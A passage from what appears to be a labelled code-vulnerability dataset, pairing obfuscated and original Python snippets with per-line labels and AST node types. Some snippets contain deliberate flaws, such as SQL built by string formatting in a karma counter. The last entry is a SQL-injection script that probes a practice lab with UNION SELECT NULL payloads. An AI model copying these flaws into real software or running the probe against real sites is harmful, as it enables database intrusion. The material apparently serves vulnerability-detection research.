"from m5.objects.Device import PioDevice\n",
"from m5.objects.Platform import Platform\n",
"VAR_0 = 'BaseGic'\n",
"VAR_1 = True\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_3 = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"VAR_4 = Param.UInt32(0, 'Distributor Implementer Identification Register')\n",
"VAR_5 = Param.UInt32(0, 'Peripheral Identification Register')\n",
"VAR_6 = Param.UInt32(0, 'CPU Interface Identification Register')\n",
"VAR_7 = Param.UInt32(0, 'VM CPU Interface Identification Register')\n",
"VAR_0 = 'ArmInterruptPin'\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_8 = 'ArmInterruptPinGen'\n",
"VAR_1 = True\n",
"VAR_3 = Param.Platform(Parent.any, 'Platform with interrupt controller')\n",
"VAR_9 = Param.UInt32('Interrupt number in GIC')\n",
"VAR_0 = 'ArmSPI'\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_8 = 'ArmSPIGen'\n",
"VAR_0 = 'ArmPPI'\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_8 = 'ArmPPIGen'\n",
"VAR_0 = 'GicV2'\n",
"VAR_2 = 'dev/arm/gic_v2.hh'\n",
"VAR_10 = Param.Addr('Address for distributor')\n",
"VAR_11 = Param.Addr('Address for cpu')\n",
"VAR_12 = Param.Addr(8192, 'Size of cpu register bank')\n",
"VAR_13 = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"VAR_14 = Param.Latency('10ns', 'Delay for PIO r/w to cpu interface')\n",
"VAR_15 = Param.Latency('10ns', 'Delay for interrupt to get to CPU')\n",
"VAR_16 = Param.UInt32(128, 'Number of interrupt lines supported (max = 1020)')\n",
"VAR_17 = Param.Bool(False, 'Enable gem5 extensions')\n",
"\"\"\"string\"\"\"\n",
"VAR_5 = 2864272\n",
"VAR_4 = 33559611\n",
"VAR_6 = 33690683\n",
"VAR_7 = VAR_6\n",
"VAR_0 = 'Gicv2mFrame'\n",
"VAR_2 = 'dev/arm/gic_v2m.hh'\n",
"VAR_18 = Param.UInt32(0, 'Frame SPI base number')\n",
"VAR_19 = Param.UInt32(0, 'Frame SPI total number')\n",
"VAR_20 = Param.Addr('Address for frame PIO')\n",
"VAR_0 = 'Gicv2m'\n",
"VAR_2 = 'dev/arm/gic_v2m.hh'\n",
"VAR_21 = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"VAR_22 = Param.BaseGic(Parent.any, 'Gic on which to trigger interrupts')\n",
"VAR_23 = VectorParam.Gicv2mFrame([], 'Power of two number of frames')\n",
"VAR_0 = 'VGic'\n",
"VAR_2 = 'dev/arm/vgic.hh'\n",
"VAR_22 = Param.BaseGic(Parent.any, 'Gic to use for interrupting')\n",
"VAR_3 = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"VAR_24 = Param.Addr(0, 'Address for vcpu interfaces')\n",
"VAR_25 = Param.Addr(0, 'Address for hv control')\n",
"VAR_21 = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"VAR_26 = Param.UInt32('HV maintenance interrupt number')\n",
"VAR_7 = Param.UInt32(Self.gic.gicc_iidr,\n 'VM CPU Interface Identification Register')\n",
"def FUNC_0(self, VAR_27):...\n",
"VAR_22 = self.gic.unproxy(self)\n",
"VAR_32 = FdtNode('interrupt-controller')\n",
"VAR_32.appendCompatible(['gem5,gic', 'arm,cortex-a15-gic', 'arm,cortex-a9-gic']\n )\n",
"VAR_32.append(FdtPropertyWords('#interrupt-cells', [3]))\n",
"VAR_32.append(FdtPropertyWords('#address-cells', [0]))\n",
"VAR_32.append(FdtProperty('interrupt-controller'))\n",
"VAR_33 = VAR_27.addrCells(VAR_22.dist_addr) + VAR_27.sizeCells(4096\n ) + VAR_27.addrCells(VAR_22.cpu_addr) + VAR_27.sizeCells(4096\n ) + VAR_27.addrCells(self.hv_addr) + VAR_27.sizeCells(8192\n ) + VAR_27.addrCells(self.vcpu_addr) + VAR_27.sizeCells(8192)\n",
"VAR_32.append(FdtPropertyWords('reg', VAR_33))\n",
"VAR_32.append(FdtPropertyWords('interrupts', [1, int(self.maint_int) - 16, \n 3844]))\n",
"VAR_32.appendPhandle(VAR_22)\n",
"yield VAR_32\n",
"VAR_0 = 'Gicv3'\n",
"VAR_2 = 'dev/arm/gic_v3.hh'\n",
"VAR_10 = Param.Addr('Address for distributor')\n",
"VAR_13 = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"VAR_28 = Param.Addr('Address for redistributors')\n",
"VAR_29 = Param.Latency('10ns', 'Delay for PIO r/w to redistributors')\n",
"VAR_16 = Param.UInt32(1020, 'Number of interrupt lines supported (max = 1020)')\n",
"VAR_26 = Param.ArmInterruptPin('string')\n",
"VAR_30 = Param.Unsigned(256,\n 'Maximum number of PE. This is affecting the maximum number of redistributors'\n )\n",
"VAR_31 = Param.Bool(True, 'GICv4 extension available')\n"
] | [
"from m5.params import *\n",
"from m5.proxy import *\n",
"from m5.util.fdthelper import *\n",
"from m5.SimObject import SimObject\n",
"from m5.objects.Device import PioDevice\n",
"from m5.objects.Platform import Platform\n",
"type = 'BaseGic'\n",
"abstract = True\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"platform = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"gicd_iidr = Param.UInt32(0, 'Distributor Implementer Identification Register')\n",
"gicd_pidr = Param.UInt32(0, 'Peripheral Identification Register')\n",
"gicc_iidr = Param.UInt32(0, 'CPU Interface Identification Register')\n",
"gicv_iidr = Param.UInt32(0, 'VM CPU Interface Identification Register')\n",
"type = 'ArmInterruptPin'\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"cxx_class = 'ArmInterruptPinGen'\n",
"abstract = True\n",
"platform = Param.Platform(Parent.any, 'Platform with interrupt controller')\n",
"num = Param.UInt32('Interrupt number in GIC')\n",
"type = 'ArmSPI'\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"cxx_class = 'ArmSPIGen'\n",
"type = 'ArmPPI'\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"cxx_class = 'ArmPPIGen'\n",
"type = 'GicV2'\n",
"cxx_header = 'dev/arm/gic_v2.hh'\n",
"dist_addr = Param.Addr('Address for distributor')\n",
"cpu_addr = Param.Addr('Address for cpu')\n",
"cpu_size = Param.Addr(8192, 'Size of cpu register bank')\n",
"dist_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"cpu_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to cpu interface')\n",
"int_latency = Param.Latency('10ns', 'Delay for interrupt to get to CPU')\n",
"it_lines = Param.UInt32(128, 'Number of interrupt lines supported (max = 1020)'\n )\n",
"gem5_extensions = Param.Bool(False, 'Enable gem5 extensions')\n",
"\"\"\"\n As defined in:\n \"ARM Generic Interrupt Controller Architecture\" version 2.0\n \"CoreLink GIC-400 Generic Interrupt Controller\" revision r0p1\n \"\"\"\n",
"gicd_pidr = 2864272\n",
"gicd_iidr = 33559611\n",
"gicc_iidr = 33690683\n",
"gicv_iidr = gicc_iidr\n",
"type = 'Gicv2mFrame'\n",
"cxx_header = 'dev/arm/gic_v2m.hh'\n",
"spi_base = Param.UInt32(0, 'Frame SPI base number')\n",
"spi_len = Param.UInt32(0, 'Frame SPI total number')\n",
"addr = Param.Addr('Address for frame PIO')\n",
"type = 'Gicv2m'\n",
"cxx_header = 'dev/arm/gic_v2m.hh'\n",
"pio_delay = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"gic = Param.BaseGic(Parent.any, 'Gic on which to trigger interrupts')\n",
"frames = VectorParam.Gicv2mFrame([], 'Power of two number of frames')\n",
"type = 'VGic'\n",
"cxx_header = 'dev/arm/vgic.hh'\n",
"gic = Param.BaseGic(Parent.any, 'Gic to use for interrupting')\n",
"platform = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"vcpu_addr = Param.Addr(0, 'Address for vcpu interfaces')\n",
"hv_addr = Param.Addr(0, 'Address for hv control')\n",
"pio_delay = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"maint_int = Param.UInt32('HV maintenance interrupt number')\n",
"gicv_iidr = Param.UInt32(Self.gic.gicc_iidr,\n 'VM CPU Interface Identification Register')\n",
"def generateDeviceTree(self, state):...\n",
"gic = self.gic.unproxy(self)\n",
"node = FdtNode('interrupt-controller')\n",
"node.appendCompatible(['gem5,gic', 'arm,cortex-a15-gic', 'arm,cortex-a9-gic'])\n",
"node.append(FdtPropertyWords('#interrupt-cells', [3]))\n",
"node.append(FdtPropertyWords('#address-cells', [0]))\n",
"node.append(FdtProperty('interrupt-controller'))\n",
"regs = state.addrCells(gic.dist_addr) + state.sizeCells(4096\n ) + state.addrCells(gic.cpu_addr) + state.sizeCells(4096\n ) + state.addrCells(self.hv_addr) + state.sizeCells(8192\n ) + state.addrCells(self.vcpu_addr) + state.sizeCells(8192)\n",
"node.append(FdtPropertyWords('reg', regs))\n",
"node.append(FdtPropertyWords('interrupts', [1, int(self.maint_int) - 16, 3844])\n )\n",
"node.appendPhandle(gic)\n",
"yield node\n",
"type = 'Gicv3'\n",
"cxx_header = 'dev/arm/gic_v3.hh'\n",
"dist_addr = Param.Addr('Address for distributor')\n",
"dist_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"redist_addr = Param.Addr('Address for redistributors')\n",
"redist_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to redistributors')\n",
"it_lines = Param.UInt32(1020,\n 'Number of interrupt lines supported (max = 1020)')\n",
"maint_int = Param.ArmInterruptPin(\n 'HV maintenance interrupt.ARM strongly recommends that maintenance interrupts are configured to use INTID 25 (PPI Interrupt).'\n )\n",
"cpu_max = Param.Unsigned(256,\n 'Maximum number of PE. This is affecting the maximum number of redistributors'\n )\n",
"gicv4 = Param.Bool(True, 'GICv4 extension available')\n"
] | [
0,
0,
0,
0,
2,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"def FUNC_2(self):...\n",
""
] | [
"def tearDown(self):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_10(self):...\n",
"\"\"\"docstring\"\"\"\n",
"if self._validated_binaries:\n",
"return\n",
"if self._minimum_version:\n",
"VAR_2 = self._get_version(VAR_12)\n",
"if self._maximum_version:\n",
"if VAR_2 < self._minimum_version:\n",
"VAR_2 = self._get_version(VAR_12)\n",
"self._bin_path = os.path.join(self.home, 'bin')\n",
"if VAR_2 > self._maximum_version:\n",
"self._validated_executable('javac')\n",
"if self._jdk:\n",
"self._is_jdk = True\n",
"VAR_0.debug(\n 'Failed to validate javac executable. Please check you have a JDK installed. Original error: {}'\n .format(e))\n"
] | [
"def validate(self):...\n",
"\"\"\"docstring\"\"\"\n",
"if self._validated_binaries:\n",
"return\n",
"if self._minimum_version:\n",
"version = self._get_version(java)\n",
"if self._maximum_version:\n",
"if version < self._minimum_version:\n",
"version = self._get_version(java)\n",
"self._bin_path = os.path.join(self.home, 'bin')\n",
"if version > self._maximum_version:\n",
"self._validated_executable('javac')\n",
"if self._jdk:\n",
"self._is_jdk = True\n",
"logger.debug(\n 'Failed to validate javac executable. Please check you have a JDK installed. Original error: {}'\n .format(e))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Condition",
"Assign'",
"Expr'"
] |
[
"def FUNC_7(self):...\n",
"return self.groups\n"
] | [
"def get_groups(self):...\n",
"return self.groups\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_18(self):...\n",
"def FUNC_24():...\n",
"VAR_15 = self.mock_nsx_clustered_api(session_response=connect_timeout)\n",
"VAR_15._validate = mock.Mock()\n",
"self.assertRaises(nsxlib_exc.ServiceClusterUnavailable, VAR_15.get,\n 'api/v1/transport-zones')\n"
] | [
"def test_cluster_proxy_connection_error(self):...\n",
"def connect_timeout():...\n",
"api = self.mock_nsx_clustered_api(session_response=connect_timeout)\n",
"api._validate = mock.Mock()\n",
"self.assertRaises(nsxlib_exc.ServiceClusterUnavailable, api.get,\n 'api/v1/transport-zones')\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_3(self, VAR_8, VAR_9):...\n",
"for line in VAR_8:\n",
"if line.startswith(VAR_9):\n",
"return\n",
"return line[len(VAR_9):]\n"
] | [
"def _get_prefixed_value(self, lines, prefix):...\n",
"for line in lines:\n",
"if line.startswith(prefix):\n",
"return\n",
"return line[len(prefix):]\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_4(self, VAR_7):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_17 = self.session.get('https://www.kijiji.ca/m-my-ads.html')\n",
"VAR_18 = {'Action': 'DELETE_ADS', 'Mode': 'ACTIVE', 'needsRedirect':\n 'false', 'ads':\n '[{{\"adId\":\"{}\",\"reason\":\"PREFER_NOT_TO_SAY\",\"otherReason\":\"\"}}]'.\n format(VAR_7), 'ca.kijiji.xsrf.token': FUNC_0(VAR_17.text,\n 'ca.kijiji.xsrf.token')}\n",
"VAR_14 = self.session.post('https://www.kijiji.ca/j-delete-ad.json', VAR_11\n =params)\n",
"if 'OK' not in VAR_14.text:\n"
] | [
"def delete_ad(self, ad_id):...\n",
"\"\"\"docstring\"\"\"\n",
"my_ads_page = self.session.get('https://www.kijiji.ca/m-my-ads.html')\n",
"params = {'Action': 'DELETE_ADS', 'Mode': 'ACTIVE', 'needsRedirect':\n 'false', 'ads':\n '[{{\"adId\":\"{}\",\"reason\":\"PREFER_NOT_TO_SAY\",\"otherReason\":\"\"}}]'.\n format(ad_id), 'ca.kijiji.xsrf.token': get_token(my_ads_page.text,\n 'ca.kijiji.xsrf.token')}\n",
"resp = self.session.post('https://www.kijiji.ca/j-delete-ad.json', data=params)\n",
"if 'OK' not in resp.text:\n"
] | [
0,
0,
0,
5,
0,
5
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Condition"
] |
[
"def FUNC_11(self):...\n",
"self.run_test_case(self.scenario.create_server_group(), timeout_ok=True)\n"
] | [
"def test_c_create_server_group(self):...\n",
"self.run_test_case(self.scenario.create_server_group(), timeout_ok=True)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_3(self):...\n",
"return self.name\n"
] | [
"def get_name(self):...\n",
"return self.name\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_0(VAR_0=['POST', 'GET', 'PUT', 'DELETE']):...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_5(VAR_1, *VAR_2, **VAR_3):...\n",
"def FUNC_6():...\n",
"if not request.method in VAR_0:\n",
"return True\n",
"if not request.environ.get('AUTH_TYPE') == 'cookie':\n",
"return True\n",
"if config.get('skip_authentication'):\n",
"return True\n",
"if request.environ.get('HTTP_REFERER'):\n",
"VAR_7 = urlparse(request.environ.get('HTTP_REFERER'))\n",
"if request.method == 'GET' and FUNC_4():\n",
"VAR_8 = VAR_7.hostname\n",
"return True\n",
"return False\n",
"if VAR_7.port:\n",
"VAR_8 += ':' + str(VAR_7.port)\n",
"if VAR_8.endswith(request.environ['adhocracy.domain']):\n",
"if request.method != 'GET':\n",
"return True\n"
] | [
"def RequireInternalRequest(methods=['POST', 'GET', 'PUT', 'DELETE']):...\n",
"\"\"\"docstring\"\"\"\n",
"def _decorate(f, *a, **kw):...\n",
"def check():...\n",
"if not request.method in methods:\n",
"return True\n",
"if not request.environ.get('AUTH_TYPE') == 'cookie':\n",
"return True\n",
"if config.get('skip_authentication'):\n",
"return True\n",
"if request.environ.get('HTTP_REFERER'):\n",
"ref_url = urlparse(request.environ.get('HTTP_REFERER'))\n",
"if request.method == 'GET' and has_token():\n",
"ref_host = ref_url.hostname\n",
"return True\n",
"return False\n",
"if ref_url.port:\n",
"ref_host += ':' + str(ref_url.port)\n",
"if ref_host.endswith(request.environ['adhocracy.domain']):\n",
"if request.method != 'GET':\n",
"return True\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
5,
0,
0,
0,
0,
0,
0,
5,
0
] | [
"FunctionDef'",
"Docstring",
"FunctionDef'",
"FunctionDef'",
"Condition",
"Return'",
"Condition",
"Return'",
"Condition",
"Return'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Return'",
"Condition",
"AugAssign'",
"Condition",
"Condition",
"Return'"
] |
[
"@VAR_0.route('/crawling/autoend')...\n",
"VAR_14 = VAR_10.get('crawl_process_id', None)\n",
"if VAR_14 < 0:\n",
"return 'process already killed'\n",
"os.kill(VAR_14, signal.SIGTERM)\n",
"VAR_15 = VAR_10.get('crawl_start_time', None)\n",
"VAR_10['crawl_total_time'] = time.time() - VAR_15\n",
"flash('Time Limit reached - Crawler interrupted automatically', 'success')\n",
"return redirect(url_for('table_detection'))\n"
] | [
"@app.route('/crawling/autoend')...\n",
"p_id = session.get('crawl_process_id', None)\n",
"if p_id < 0:\n",
"return 'process already killed'\n",
"os.kill(p_id, signal.SIGTERM)\n",
"crawl_start_time = session.get('crawl_start_time', None)\n",
"session['crawl_total_time'] = time.time() - crawl_start_time\n",
"flash('Time Limit reached - Crawler interrupted automatically', 'success')\n",
"return redirect(url_for('table_detection'))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Assign'",
"Condition",
"Return'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"\"\"\"Handlers for customizing oauthclient endpoints.\"\"\"\n",
"import six\n",
"from flask import current_app, flash, redirect, render_template, request, session, url_for\n",
"from flask.ext.login import current_user\n",
"from functools import partial, wraps\n",
"from werkzeug.utils import import_string\n",
"from invenio.base.globals import cfg\n",
"from .client import oauth, signup_handlers\n",
"from .errors import OAuthClientError, OAuthError, OAuthRejectedRequestError, OAuthResponseError\n",
"from .forms import EmailSignUpForm\n",
"from .models import RemoteAccount, RemoteToken\n",
"from .utils import oauth_authenticate, oauth_get_user, oauth_register\n",
"def FUNC_0(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"return '%s_%s' % (cfg['OAUTHCLIENT_SESSION_KEY_PREFIX'], VAR_0)\n"
] | [
"\"\"\"Handlers for customizing oauthclient endpoints.\"\"\"\n",
"import six\n",
"from flask import current_app, flash, redirect, render_template, request, session, url_for\n",
"from flask.ext.login import current_user\n",
"from functools import partial, wraps\n",
"from werkzeug.utils import import_string\n",
"from invenio.base.globals import cfg\n",
"from .client import oauth, signup_handlers\n",
"from .errors import OAuthClientError, OAuthError, OAuthRejectedRequestError, OAuthResponseError\n",
"from .forms import EmailSignUpForm\n",
"from .models import RemoteAccount, RemoteToken\n",
"from .utils import oauth_authenticate, oauth_get_user, oauth_register\n",
"def token_session_key(remote_app):...\n",
"\"\"\"docstring\"\"\"\n",
"return '%s_%s' % (cfg['OAUTHCLIENT_SESSION_KEY_PREFIX'], remote_app)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_1():...\n",
"VAR_6 = './data/input/'\n",
"VAR_7 = VAR_6 + 'download/'\n",
"VAR_8 = './data/temp/'\n",
"VAR_9 = './data/vcf/'\n",
"VAR_10 = './data/zarr/'\n",
"VAR_11 = './data/zarr_benchmark/'\n",
"VAR_12 = FUNC_0()\n",
"VAR_13 = VAR_12['command']\n",
"if VAR_13 == 'config':\n",
"VAR_14 = VAR_12['output_config']\n",
"if VAR_13 == 'setup':\n",
"VAR_15 = VAR_12['f']\n",
"print('[Setup] Setting up benchmark data.')\n",
"if VAR_13 == 'exec':\n",
"config.generate_default_config_file(output_location=output_config_location,\n overwrite=overwrite_mode)\n",
"data_service.remove_directory_tree(VAR_9)\n",
"print('[Exec] Executing benchmark tool.')\n",
"print('Error: Unexpected command specified. Exiting...')\n",
"data_service.remove_directory_tree(VAR_10)\n",
"VAR_16 = config.read_configuration(location=cli_arguments['config_file'])\n",
"sys.exit(1)\n",
"VAR_16 = config.read_configuration(location=cli_arguments['config_file'])\n",
"VAR_18 = config.VCFtoZarrConfigurationRepresentation(VAR_16)\n",
"VAR_17 = config.FTPConfigurationRepresentation(VAR_16)\n",
"if VAR_17.enabled:\n",
"print('[Setup][FTP] FTP module enabled. Running FTP download...')\n",
"print('[Setup][FTP] FTP module disabled. Skipping FTP download...')\n",
"data_service.fetch_data_via_ftp(VAR_17=ftp_config, local_directory=\n download_directory)\n",
"data_service.process_data_files(input_dir=input_directory, temp_dir=\n temp_directory, output_dir=vcf_directory)\n",
"VAR_18 = config.VCFtoZarrConfigurationRepresentation(VAR_16)\n",
"if VAR_18.enabled:\n",
"data_service.setup_vcf_to_zarr(input_vcf_dir=vcf_directory, output_zarr_dir\n =zarr_directory_setup, conversion_config=vcf_to_zarr_config)\n"
] | [
"def _main():...\n",
"input_directory = './data/input/'\n",
"download_directory = input_directory + 'download/'\n",
"temp_directory = './data/temp/'\n",
"vcf_directory = './data/vcf/'\n",
"zarr_directory_setup = './data/zarr/'\n",
"zarr_directory_benchmark = './data/zarr_benchmark/'\n",
"cli_arguments = get_cli_arguments()\n",
"command = cli_arguments['command']\n",
"if command == 'config':\n",
"output_config_location = cli_arguments['output_config']\n",
"if command == 'setup':\n",
"overwrite_mode = cli_arguments['f']\n",
"print('[Setup] Setting up benchmark data.')\n",
"if command == 'exec':\n",
"config.generate_default_config_file(output_location=output_config_location,\n overwrite=overwrite_mode)\n",
"data_service.remove_directory_tree(vcf_directory)\n",
"print('[Exec] Executing benchmark tool.')\n",
"print('Error: Unexpected command specified. Exiting...')\n",
"data_service.remove_directory_tree(zarr_directory_setup)\n",
"runtime_config = config.read_configuration(location=cli_arguments[\n 'config_file'])\n",
"sys.exit(1)\n",
"runtime_config = config.read_configuration(location=cli_arguments[\n 'config_file'])\n",
"vcf_to_zarr_config = config.VCFtoZarrConfigurationRepresentation(runtime_config\n )\n",
"ftp_config = config.FTPConfigurationRepresentation(runtime_config)\n",
"if ftp_config.enabled:\n",
"print('[Setup][FTP] FTP module enabled. Running FTP download...')\n",
"print('[Setup][FTP] FTP module disabled. Skipping FTP download...')\n",
"data_service.fetch_data_via_ftp(ftp_config=ftp_config, local_directory=\n download_directory)\n",
"data_service.process_data_files(input_dir=input_directory, temp_dir=\n temp_directory, output_dir=vcf_directory)\n",
"vcf_to_zarr_config = config.VCFtoZarrConfigurationRepresentation(runtime_config\n )\n",
"if vcf_to_zarr_config.enabled:\n",
"data_service.setup_vcf_to_zarr(input_vcf_dir=vcf_directory, output_zarr_dir\n =zarr_directory_setup, conversion_config=vcf_to_zarr_config)\n"
] | [
0,
7,
7,
7,
7,
7,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
7,
7,
7,
0,
7
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Condition",
"Expr'"
] |
[
"def FUNC_3(self):...\n",
"VAR_15 = self._server_popen.poll()\n",
"return VAR_15 is None\n"
] | [
"def _IsServerAlive(self):...\n",
"returncode = self._server_popen.poll()\n",
"return returncode is None\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_5(self):...\n",
"if not self.route:\n",
"return frappe.db.get_value('Blog Category', self.blog_category, 'route'\n ) + '/' + self.scrub(self.title)\n"
] | [
"def make_route(self):...\n",
"if not self.route:\n",
"return frappe.db.get_value('Blog Category', self.blog_category, 'route'\n ) + '/' + self.scrub(self.title)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'"
] |
[
"def FUNC_5(self, VAR_13, VAR_14, VAR_15=None):...\n",
"if VAR_14 == Qt.Horizontal and VAR_15 == Qt.DisplayRole:\n",
"return self.column_headers[VAR_13]\n"
] | [
"def headerData(self, num, orientation, role=None):...\n",
"if orientation == Qt.Horizontal and role == Qt.DisplayRole:\n",
"return self.column_headers[num]\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'"
] |
[
"def FUNC_7(VAR_4):...\n",
"VAR_11 = FUNC_4(VAR_4)\n",
"VAR_9 = FUNC_0()\n",
"VAR_10 = VAR_9.cursor()\n",
"if VAR_11 is None:\n",
"VAR_11 = VAR_11 - 1\n",
"VAR_10.execute(\n \"\"\"\n INSERT INTO people(name,karma,shame) VALUES('{}',-1,0)\n \"\"\"\n .format(VAR_4))\n",
"VAR_2.error('Execution failed with error: {}'.format(e))\n",
"VAR_10.execute(\n \"\"\"\n UPDATE people SET karma = {0} WHERE name = '{1}'\n \"\"\"\n .format(VAR_11, VAR_4))\n",
"VAR_2.error('Execution failed with error: {}'.format(e))\n",
"VAR_9.commit()\n",
"VAR_9.commit()\n",
"VAR_2.debug('Inserted into karmadb -1 karma for {}'.format(VAR_4))\n",
"VAR_2.debug('Inserted into karmadb -1 karma for {}'.format(VAR_4))\n",
"VAR_9.close()\n",
"VAR_9.close()\n",
"return -1\n",
"return VAR_11\n"
] | [
"def karma_sub(name):...\n",
"karma = karma_ask(name)\n",
"db = db_connect()\n",
"cursor = db.cursor()\n",
"if karma is None:\n",
"karma = karma - 1\n",
"cursor.execute(\n \"\"\"\n INSERT INTO people(name,karma,shame) VALUES('{}',-1,0)\n \"\"\"\n .format(name))\n",
"logger.error('Execution failed with error: {}'.format(e))\n",
"cursor.execute(\n \"\"\"\n UPDATE people SET karma = {0} WHERE name = '{1}'\n \"\"\"\n .format(karma, name))\n",
"logger.error('Execution failed with error: {}'.format(e))\n",
"db.commit()\n",
"db.commit()\n",
"logger.debug('Inserted into karmadb -1 karma for {}'.format(name))\n",
"logger.debug('Inserted into karmadb -1 karma for {}'.format(name))\n",
"db.close()\n",
"db.close()\n",
"return -1\n",
"return karma\n"
] | [
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Return'",
"Return'"
] |
[
"import requests\n",
"import sys\n",
"from bs4 import BeautifulSoup\n",
"import re\n",
"VAR_0 = 'https://abcd.web-security-academy.net/'\n",
"VAR_0 = f'{VAR_0}page'\n",
"VAR_1 = {'category': 'Lifestyle'}\n",
"VAR_2 = [\"'UNION SELECT\", 'NULL', '--']\n",
"VAR_3 = {'category': f\"Lifestyle{' '.join(VAR_2)}\"}\n",
"VAR_4 = requests.Session()\n",
"VAR_5 = VAR_4.get(VAR_0, VAR_1=params)\n",
"if VAR_5.status_code == 404:\n",
"sys.exit('The session you are looking for has expired')\n",
"def FUNC_0(VAR_2, VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_8 = VAR_4.get(VAR_0, VAR_1=sqli)\n",
"while not VAR_8.ok:\n",
"VAR_2.remove('--')\n",
"print(f\"There are {VAR_2.count('NULL')} columns\")\n",
"VAR_2.extend([',', 'NULL', '--'])\n",
"return VAR_2\n",
